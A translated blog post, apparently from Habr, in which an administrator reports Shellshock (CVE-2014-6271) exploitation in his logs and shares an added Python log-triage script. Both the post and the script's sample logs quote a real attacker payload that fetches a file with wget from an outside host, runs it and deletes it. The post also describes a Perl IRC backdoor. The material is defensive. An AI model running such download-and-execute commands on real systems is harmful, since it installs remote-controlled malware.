Active exploitation of ShellShock has begun


Good day, %username%! I want to tell a story about how my server is attacked every day through CVE-2014-6271 (Shellshock). For those who happened to miss it, there are two articles on Habr: “CVE-2014-6271, CVE-2014-7169: remote code execution in Bash” and “New dangerous ShellShock vulnerability allows attacks on many devices, from smartphones to industrial servers”.

So, once the information became public, I began seeing requests in the server logs whose headers contained a bash call. At first these were harmless requests in which the Referer and User-Agent headers carried a bash call to ping xxx.xxx.xxx.xxx; you can guess that this was already a search for potential victims.

Tonight things got a lot more interesting. Checking the server logs, I came across this request:

...
UserAgent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.YYY.YYY.YY/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*"
...
(Using wget, download the file from the remote server, set the execute bit, run it, delete it.)
(The IP address has been deliberately redacted.)

Clearly this is a mass infection of servers with bots.
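The following is an added example and not part of the original post: a small Python triage script that runs over constructed Apache combined-format log lines (documentation-range IPs, not the author's redacted addresses) and flags the Shellshock trigger in the request line, Referer and User-Agent fields. It separates the ping-back probes from the download-and-execute droppers described above and pulls out the addresses each payload contacts, which is what you would feed into a blocklist or hand to abuse contacts.

```python
"""Triage Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example, not code from the original post. SAMPLE_LOG is constructed:
the addresses are documentation ranges, not the attacker IPs the author redacted.
"""
import re
from dataclasses import dataclass

# Constructed sample: two probe requests (ping-back to the scanner's listener),
# one download-and-execute dropper, one benign request.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:03:11:02 +0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; /bin/bash -c \"ping -c 3 198.51.100.7\"" "() { :;}; /bin/bash -c \"ping -c 3 198.51.100.7\""
203.0.113.5 - - [25/Sep/2014:03:11:03 +0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :; }; echo; /bin/ping -c 1 198.51.100.7"
198.51.100.23 - - [26/Sep/2014:01:42:17 +0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 203.0.113.77/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
192.0.2.10 - - [26/Sep/2014:01:43:00 +0400] "GET /index.html HTTP/1.1" 200 1043 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
'''

# Apache "combined" format; quoted fields may contain \" escapes, hence (?:[^"\\]|\\.)*
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<user_agent>(?:[^"\\]|\\.)*)"\s*$'
)

# The Shellshock trigger: a bash function definition "() { ... }" placed in an
# environment variable value (CGI exports headers as HTTP_USER_AGENT etc.),
# followed by whatever the attacker wants bash to execute on import.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<payload>.*)', re.S)

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
DOWNLOADER_RE = re.compile(r'\b(?:wget|curl|tftp|fetch|lwp-download)\b')
EXEC_RE = re.compile(r'\bchmod\b|\bperl\b|\bpython\b|\bsh\b|/(?:var/)?tmp/\S+')
PING_RE = re.compile(r'\bping\b')


@dataclass(frozen=True)
class Finding:
    src_ip: str
    timestamp: str
    fields: tuple      # which log fields carried the trigger
    payload: str       # command text after the function body, unescaped
    kind: str          # "dropper", "probe" or "other"
    hosts: tuple       # IPv4 literals referenced by the payload (IoCs)


def unescape(value: str) -> str:
    """Undo Apache's backslash escaping (\\" and \\\\) inside quoted log fields."""
    return re.sub(r'\\(.)', r'\1', value)


def parse_combined(line: str):
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def extract_payload(value: str):
    """Return the command text following a Shellshock function definition, or None."""
    m = SHELLSHOCK_RE.search(unescape(value))
    return m.group('payload').strip() if m else None


def classify(payload: str) -> str:
    if DOWNLOADER_RE.search(payload) and EXEC_RE.search(payload):
        return 'dropper'   # fetch, mark executable, run: the pattern in the post
    if PING_RE.search(payload):
        return 'probe'     # blind ping-back to confirm the host is exploitable
    return 'other'


def scan(log_text: str):
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_combined(line)
        if rec is None:
            continue
        hit_fields, payloads = [], []
        for name in ('request', 'referer', 'user_agent'):
            payload = extract_payload(rec[name])
            if payload is not None:
                hit_fields.append(name)
                payloads.append(payload)
        if not hit_fields:
            continue
        payload = payloads[-1]  # fields usually repeat the same command; keep the last
        hosts = tuple(dict.fromkeys(IPV4_RE.findall(payload)))
        findings.append(Finding(rec['ip'], rec['ts'], tuple(hit_fields),
                                payload, classify(payload), hosts))
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f'{f.timestamp} {f.src_ip} {f.kind:8} via {",".join(f.fields)}: {f.payload}')
        if f.hosts:
            print('    contacts:', ', '.join(f.hosts))
```

To run it against a real server, replace SAMPLE_LOG with the contents of access_log. Note that the regex searches anywhere in the field rather than only at its start: bash only honoured the trigger at the start of a variable value, but scanners vary the framing, and a looser match costs nothing in a log review.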

Well, I downloaded the file; it turned out to be a Perl script. Running it through VirusTotal, we see only one detection:

Sophos - Mal/PerlBot-A

The rest say everything is fine.

Well, let's take a look. Opening the file in a text editor, we see:

#!/usr/bin/perl
use MIME::Base64;
eval(decode_base64('IyEvdXNyL2Jpbi9wZXJsDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj ..... MjIyMjIyMjIyMNCg=='));

Everything is immediately clear: a typical way of hiding code. Well, decode the base64 and we get the following:

## many comments
## perlBot v1.02012 By unknown @unknown ## [ Help ] ####################################
## many comments


Now everything is clear: another backdoor for remote control, managed via IRC. I am not very familiar with Perl, but skimming through the file it is noticeable that it includes privilege escalation (by guessing the root password; the dictionary is quite small), flooding, and launching some utilities (mail, port scanning, bringing up DNS).

In conclusion, I would like to give some advice to novice system administrators.

Keep an eye on the systems in your care! If you think bash plays no part in your systems, you may be making a big mistake.

Bash is reachable through Apache (mod_cgi, mod_cgid), DHCP clients, OpenSSH, as well as Git and Subversion, and of course your router may be vulnerable too.

There are plenty of public attack repositories on GitHub, though exploiting this vulnerability is so easy that any novice miscreant can manage it.

Related links

Information about PerlBot (modification) [EN];
DigitalOcean article on how to defend against Shellshock.
